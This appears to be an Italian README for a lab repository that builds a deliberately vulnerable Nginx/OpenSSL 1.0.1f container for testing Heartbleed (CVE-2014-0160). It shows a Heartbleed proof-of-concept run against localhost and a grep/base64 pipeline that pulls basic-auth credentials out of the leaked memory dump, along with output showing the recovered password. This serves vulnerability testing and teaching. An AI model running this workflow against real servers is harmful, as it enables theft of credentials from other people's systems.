
Dockerfile per testare lo sfruttamento di Heartbleed CVE-2014-0160.
Questo repository contiene il Dockerfile di Nginx con la vulnerabile versione OpenSSL (1.0.1f) per testare la vulnerabilità CVE-2014-0160 Heartbleed.
Installa Docker
apt-get install -y dockerScarica l'immagine base debian dal pubblico Docker Hub Registry:
docker pull debian:latest
Costruisci l'immagine dal Dockerfile: docker build -t heartbleed_nginx_img .
docker run -i -t -p 1500:443 heartbleed_nginx_img
Scarica lo script Python Heartbleed-poc (Solo per scopi di test!). Questa è una versione modificata, originariamente di Jared Stafford [email protected]. Grazie a SensePost per questo.
Apri due nuove schede nel tuo terminale corrente ed esegui:
Prima scheda (Generazione di x100 richieste GET usando HTTP Basic Auth con il comando curl):
for loop in {0..100..1}; do curl -X GET -s -i -k -u admin:myP@ssword0MG https://127.0.0.1:1500| grep -E "200"; done
HTTP/1.1 200 OK HTTP/1.1 200 OK HTTP/1.1 200 OK HTTP/1.1 200 OK snipp...
Seconda scheda (Generando x100 richieste Heartbeat (-n 100) e scrivendo il memory dump nel file "dump.bin", quindi prelevando il risultato del campo "Authorization" dal memory dump e infine decodificando la stringa Base64 risultante in testo in chiaro ^^):
python heartbleed-poc.py -f dump.bin -q -n 100 -p 1500 127.0.0.1 && grep -a "^Authorization:" dump.bin | head -n1 | awk -F " " '{print $3}' | tr -d '\n\r' | base64 --decode && echo
WARNING: server 127.0.0.1 returned more data than it should - server is vulnerable! ... received message: type = 22, ver = 0302, length = 66 ... received message: type = 22, ver = 0302, length = 925 ... received message: type = 22, ver = 0302, length = 331 ... received message: type = 22, ver = 0302, length = 4 ... received message: type = 24, ver = 0302, length = 16384 WARNING: server 127.0.0.1 returned more data than it should - server is vulnerable! snipp... admin:myP@ssword0MG